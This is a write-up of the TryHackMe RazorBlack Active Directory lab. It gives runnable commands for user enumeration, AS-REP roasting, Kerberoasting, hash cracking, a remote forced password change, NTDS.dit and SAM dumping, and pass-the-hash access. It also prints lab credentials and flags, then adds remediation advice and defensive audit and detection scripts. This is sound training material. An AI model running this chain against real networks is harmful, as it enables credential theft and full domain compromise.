This document is a structured security write-up based on hands-on exploitation of the RazorBlack lab on the TryHackMe website: https://tryhackme.com/room/raz0rblack

Date: January 20, 2026
Source: TryHackMe — RazorBlack & Personal Hands-On Practice

Summary

The RazorBlack lab features a Windows-based Active Directory environment where initial entry was gained through an insecure NFS (Network File System) share. By mounting the /users share, sensitive employee data was exfiltrated, leading to the discovery of a valid username list. Subsequent Kerberoasting and AS-REP roasting, combined with a password spray and a forced password change for the user sbradley, allowed for lateral movement across SMB shares. After retrieving a protected ZIP file containing an NTDS.dit database backup, an offline credential dump provided the NTLM hash for the user lvetrova, granting WinRM access and ultimately a path to escalate to Administrator by leveraging SeBackupPrivilege on the account xyan1d3.

Technical Overview

1. Discovery

First, information gathering with Nmap:

nmap -sC -sV -v -p- 10.82.151.164

Domain Name:

raz0rblack.thm

/etc/hosts:

10.82.151.164 raz0rblack.thm

Among the open ports:

2049/tcp  open  nlockmgr

nlockmgr — Network Lock Manager, the service NFS uses to manage file locking across a network.

Let's check it out:

showmount -e 10.82.151.164

Mount it.

mkdir /mnt/nlockmgr
mount -t nfs 10.82.151.164:/users /mnt/nlockmgr -o nolock
cd /mnt/nlockmgr

sbradley.txt contains Steven's flag:

THM{ab53e05c9a98def00314a14ccbfa8104}

employee_status.xlsx lists the employees; their usernames go into a wordlist:

nano usernames.txt

usernames.txt:

sbradley
dport
iroyce
tvidal
aedwards
cingram
ncassidy
rzaydan
lvetrova
rdelgado
twilliams
clin

Enumerate which of these accounts exist in the domain with Kerbrute:

./kerbrute_linux_amd64 userenum -d raz0rblack.thm --dc 10.82.151.164 usernames.txt

Valid accounts found, saved to users.txt:

lvetrova
sbradley
twilliams

AS-REP roast the accounts that do not require Kerberos pre-authentication:

impacket-GetNPUsers raz0rblack.thm/ -dc-ip 10.82.151.164 -usersfile users.txt -format hashcat -outputfile hashes.txt

Crack hashes.txt with hashcat (mode 18200, Kerberos 5 AS-REP):

hashcat -m 18200 hashes.txt /usr/share/eaphammer/wordlists/rockyou.txt

Here we go:

twilliams:roastpotatoes

Validate the credential over SMB:

nxc smb 10.82.151.164 -u 'twilliams' -p 'roastpotatoes'

Result:

[+] raz0rblack.thm\twilliams:roastpotatoes

Enumerate shares:

smbmap -u 'twilliams' -p 'roastpotatoes' -H 10.82.151.164

smbclient //10.82.151.164/NETLOGON -U twilliams%'roastpotatoes'
smbclient //10.82.151.164/SYSVOL -U twilliams%'roastpotatoes'

Nothing interesting there.

Check whether the same password is reused by other users:

crackmapexec smb raz0rblack.thm -u usernames.txt -p roastpotatoes --shares

Result:

[-] raz0rblack.thm\sbradley:roastpotatoes STATUS_PASSWORD_MUST_CHANGE

Interesting. Let's change the password for this user.

python3 smbpasswd.py sbradley@10.82.151.164

New credential:

sbradley:pass12345

Validate it:

nxc smb 10.82.151.164 -u 'sbradley' -p 'pass12345'

Result:

[+] raz0rblack.thm\sbradley:pass12345

Enumerate shares again:

smbmap -u sbradley -p 'pass12345' -H 10.82.151.164

In the "trash" directory there is experiment_gone_wrong.zip. Download everything:

mget *

Crack the archive's password with john:

zip2john experiment_gone_wrong.zip > ziphash.txt
john ziphash.txt

Here we go:

experiment_gone_wrong.zip:electromagnetismo

The zip file's password:

electromagnetismo

The archive contains ntds.dit and system.hive, enough for an offline dump of the domain hashes:

impacket-secretsdump -ntds ntds.dit -system system.hive LOCAL | tee dump.txt

Clean it up:

cat dump.txt | cut -d ":" -f 4 > clean_dump.txt

Spray the NT hashes against the username list (pass-the-hash):

crackmapexec smb 10.82.151.164 -u usernames.txt -H clean_dump.txt

Result:

[+] raz0rblack.thm\lvetrova:f220d3988deb3f516c73f40ee16c431d

Ljudmila's Hash:

f220d3988deb3f516c73f40ee16c431d

2. Penetration

evil-winrm -i 10.82.151.164 -u 'lvetrova' -H 'f220d3988deb3f516c73f40ee16c431d'

A file lvetrova.xml is present, a PowerShell credential exported with Export-Clixml:

Get-Content lvetrova.xml

Import it in the same user context and read the plaintext password:

$creds = Import-Clixml -Path .\lvetrova.xml
$creds.GetNetworkCredential().password

Ljudmila's Flag:

THM{694362e877adef0d85a92e6d17551fe4}

Kerberoast it:

impacket-GetUserSPNs raz0rblack.thm/lvetrova -dc-ip 10.82.151.164 -hashes f220d3988deb3f516c73f40ee16c431d:f220d3988deb3f516c73f40ee16c431d -request

The service ticket for xyan1d3 is saved to xyan.txt; crack it (mode 13100, Kerberos 5 TGS-REP):

hashcat -m 13100 xyan.txt /usr/share/eaphammer/wordlists/rockyou.txt

Xyan1d3's password:

xyan1d3:cyanide9amine5628

3. Escalation

evil-winrm -i 10.82.151.164 -u 'xyan1d3' -p 'cyanide9amine5628'

xyan1d3.xml is another exported credential; decrypt it the same way:

$creds = Import-Clixml -Path .\xyan1d3.xml
$creds.GetNetworkCredential().password

Xyan1d3's Flag:

THM{62ca7e0b901aa8f0b233cade0839b5bb}

Check the account's privileges:

whoami /priv

xyan1d3 holds SeBackupPrivilege and SeRestorePrivilege -> the SAM and SYSTEM hives can be saved as sam.bak and system.bak and downloaded.

Info: Download successful!

impacket-secretsdump -sam sam.bak -system system.bak LOCAL

evil-winrm -i 10.82.151.164 -u 'Administrator' -H '9689931bed40ca5a2ce1218210177f0c'

Success.

$creds = Import-Clixml -Path .\root.xml

Something is wrong; let's figure it out.

https://gchq.github.io/CyberChef

The stored value is hex-encoded; decoding it gives the flag.

The root Flag:

THM{1b4f46cc4fba46348273d18dc91da20d}

Finally, search the filesystem for a file named top*:

gci -recurse -filter "top*"

The way to exit vim is:

:wq

Security Failures & Root Causes Classification

  • Insecure Network Shares — Misconfigured NFS Permissions — High Impact — The /users directory was exported via NFS with insufficient access controls, allowing any unauthenticated network user to mount the drive and harvest internal usernames and documents.
  • Credential Exposure in Backups — Poorly Protected Sensitive Files — Critical Impact — A backup of the Active Directory database (ntds.dit) was stored in a ZIP file within a "trash" SMB share; although password-protected, the protection was weak enough to brute-force offline, exposing every domain hash.
  • Weak Account Policy — Password Must Change Status — Medium Impact — The account sbradley carried the STATUS_PASSWORD_MUST_CHANGE flag, which let an attacker who knew the old password set a new one remotely over SMB and reach further internal shares.
  • Excessive Privileges — SeBackup & SeRestore Privileges — High Impact — The user xyan1d3 was assigned high-level backup privileges; these rights were leveraged to dump the SAM and SYSTEM hives, allowing for a Pass-the-Hash attack to gain full Administrator control.
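The first item can be checked mechanically. The following audit script is an added example, not part of the original write-up; the export table it inspects is a constructed sample whose first export line mirrors the /users pattern above and whose last line shows the hardened form of the same share.

```python
"""Audit /etc/exports for shares reachable by any host or without Kerberos authentication.

Added example, not part of the original write-up. SAMPLE_EXPORTS is constructed: its
first export line mirrors the weak /users pattern from the lab, the last line shows
the hardened form of the same share.
"""
import re

SAMPLE_EXPORTS = """\
# constructed sample, not the lab's real configuration
/users *(rw,sync)
/srv/backups 10.82.151.0/24(rw,sync,no_root_squash)
/users 10.82.151.10(ro,sync,sec=krb5p,root_squash)
"""

CLIENT_RE = re.compile(r"^([^(]*)(?:\((.*)\))?$")   # host-or-network[(options)]


def parse_exports(text):
    """Yield (path, client, options) for every client spec in an exports file."""
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        path, *specs = line.split()
        for spec in specs or ["*"]:        # a path with no client spec is exported to the world
            client, opts = CLIENT_RE.match(spec).groups()
            yield path, client or "*", set(filter(None, (opts or "").split(",")))


def audit_exports(text):
    """Return one (path, client, reason) tuple per weakness found in the export table."""
    findings = []
    for path, client, opts in parse_exports(text):
        if client == "*":
            findings.append((path, client, "exported to every host instead of an allow-list"))
        if not any(o.startswith("sec=krb5") for o in opts):
            # the default sec=sys (AUTH_SYS) trusts whatever uid the client claims
            findings.append((path, client, "AUTH_SYS only, no client authentication"))
        if "no_root_squash" in opts:
            findings.append((path, client, "remote root keeps root on the export"))
    return findings


if __name__ == "__main__":
    for path, client, reason in audit_exports(SAMPLE_EXPORTS):
        print(f"{path} {client}: {reason}")
```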

Remediation Recommendations

  • Audit and Secure NFS Exports by restricting access to specific authorized IP addresses and ensuring that sensitive user directories are not shared publicly without strict authentication.
  • Implement Stronger Encryption for all administrative backups and ensure that sensitive files like ntds.dit are stored in highly restricted, offline, or vaulted locations rather than general-purpose file shares.
  • Enforce Tiered Administration to ensure that service accounts or standard users (like xyan1d3) do not possess dangerous privileges like SeBackupPrivilege unless absolutely necessary for their specific role.
  • Monitor Active Directory for anomalous behavior, such as a sudden surge in Kerberos ticket requests (Kerberoasting, AS-REP roasting) or unexpected remote password changes over SMB (as done here with smbpasswd.py) that reset user credentials.
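For the monitoring point in the last item, here is an added detection example (not from the original write-up) that flags the two Kerberos patterns used in this lab over Windows Security events: AS-REP roasting (4768 without pre-authentication, RC4) and Kerberoasting (4769 RC4 service tickets for many SPNs). The events are constructed; the client IPs, the service accounts other than xyan1d3 and the thresholds are assumptions.

```python
"""Flag AS-REP roasting and Kerberoasting bursts in Windows Security events.

Added example, not from the original write-up. Field names follow the 4768/4769 event
data (TicketEncryptionType, PreAuthType, ServiceName, IpAddress); the events below,
the client IPs and the thresholds are constructed assumptions.
"""
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"   # the roastable etype; AES tickets (0x11/0x12) are far harder to crack
# Constructed events: (time, event_id, account, service_name, enc_type, pre_auth_type, client_ip)
EVENTS = [
    ("2026-01-20T10:00:01", 4768, "sbradley",  "krbtgt",   "0x17", "0", "10.82.151.50"),
    ("2026-01-20T10:00:01", 4768, "twilliams", "krbtgt",   "0x17", "0", "10.82.151.50"),
    ("2026-01-20T10:00:02", 4768, "lvetrova",  "krbtgt",   "0x17", "0", "10.82.151.50"),
    ("2026-01-20T10:05:00", 4768, "cingram",   "krbtgt",   "0x12", "2", "10.82.151.22"),  # normal
    ("2026-01-20T11:00:00", 4769, "lvetrova",  "xyan1d3",  "0x17", "-", "10.82.151.50"),
    ("2026-01-20T11:00:01", 4769, "lvetrova",  "svc_sql",  "0x17", "-", "10.82.151.50"),
    ("2026-01-20T11:00:01", 4769, "lvetrova",  "svc_http", "0x17", "-", "10.82.151.50"),
    ("2026-01-20T11:00:02", 4769, "lvetrova",  "FILESRV$", "0x17", "-", "10.82.151.50"),  # skipped
]


def detect_roasting(events, window=timedelta(minutes=5), threshold=3):
    """Return one finding per burst: 'asrep' when one client IP pulls RC4 AS-REPs for
    many accounts that need no pre-authentication (4768, PreAuthType 0); 'kerberoast'
    when one account requests RC4 service tickets for many SPNs (4769). Computer
    accounts ($) are skipped: their random machine passwords are not crackable."""
    recent = defaultdict(list)          # key -> [(time, name)] still inside the window
    findings = {}
    for ts, eid, account, service, enc, pre_auth, ip in sorted(events):
        if enc != RC4_HMAC:
            continue
        if eid == 4768 and pre_auth == "0":
            key, name = ("asrep", ip), account
        elif eid == 4769 and not service.endswith("$"):
            key, name = ("kerberoast", ip, account), service
        else:
            continue
        t = datetime.fromisoformat(ts)
        bucket = recent[key]
        bucket.append((t, name))
        bucket[:] = [(bt, bn) for bt, bn in bucket if t - bt <= window]
        names = sorted({bn for _, bn in bucket})
        if len(names) >= threshold:
            finding = {"type": key[0], "client_ip": ip, "names": names}
            if key[0] == "kerberoast":
                finding["account"] = account
            findings[key] = finding
    return list(findings.values())
```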

Conclusion

The compromise of the RazorBlack domain demonstrates how minor configuration oversights in peripheral services — like NFS — can provide the leverage needed to topple an entire Active Directory infrastructure. While the attacker began with no credentials, the ability to harvest usernames and exploit a misconfigured "Password Must Change" status created a domino effect. This lab serves as a powerful reminder that internal security relies not just on strong passwords, but on the principle of least privilege and the rigorous protection of sensitive system backups.

Write-up compiled based on TryHackMe RazorBlack (https://tryhackme.com/room/raz0rblack) lab.